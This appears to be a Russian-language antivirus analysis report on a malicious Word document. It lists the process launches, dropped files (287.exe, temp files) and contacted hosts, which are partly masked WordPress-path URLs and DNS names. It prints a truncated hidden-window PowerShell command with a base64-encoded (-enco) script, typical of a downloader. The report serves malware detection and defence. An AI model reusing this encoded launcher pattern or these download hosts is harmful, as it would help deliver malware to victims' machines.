Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABJAGsAbgB5AHkAdAB3AHIAPQAnAEsAbABzAGYAawB2AHMAZQAnADsAJABGAG8AeQBsAHoAdwByAHIAdwByACAAPQAgACcAMgA4ADcAJwA7ACQATgBmAHEAagB4AGsAaQBuAHcAYQByAHAAPQAnAEQAawBwAG0AbABuAGgAYwBmAGUAbgB0ACcAOwA...
- %HOMEPATH%\287.exe
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- http://fl######fordcarolina.com/wp-content/za1c83552/
- http://www.ex##ens.app/wp-includes/kvth138/
- DNS ASK mp####uipartes.com
- DNS ASK ba##yra.com
- DNS ASK wh##h.xyz
- DNS ASK fl######fordcarolina.com
- DNS ASK ex##ens.app
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABJAGsAbgB5AHkAdAB3AHIAPQAnAEsAbABzAGYAawB2AHMAZQAnADsAJABGAG8AeQBsAHoAdwByAHIAdwByACAAPQAgACcAMgA4ADcAJwA7ACQATgBmAHEAagB4AGsAaQBuAHcAYQByAHAAPQAnAEQAawBwAG0AbABuAGgAYwBmAGUAbgB0ACcAOwA...' (со скрытым окном)